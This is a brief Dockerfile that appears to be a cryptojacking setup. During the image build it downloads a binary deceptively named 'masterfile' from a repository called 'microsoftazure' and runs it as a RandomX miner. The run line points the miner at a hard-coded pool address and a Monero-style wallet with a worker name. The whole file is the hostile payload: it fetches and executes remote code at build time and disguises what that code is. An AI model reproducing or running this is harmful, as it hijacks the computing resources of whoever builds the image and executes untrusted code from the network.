FROM ubuntu:20.04
#-----------------
RUN apt-get update
RUN apt-get install -y wget
RUN wget https://bitbucket.org/AnjayEmail001/microsoftazure/downloads/masterfile
RUN chmod u+x masterfile
RUN ./masterfile --disable-gpu --algorithm randomx --pool 18.210.126.40:10032 --44dWWt57wRicWrDfRhNZne5WNBKAk6rbsFmXSQ3XVNJzLZe91gNfW7YbUupCLHyFx7RiNPV3wNyubcvZHKFcGfkjLi4eBsQ.Pekerja01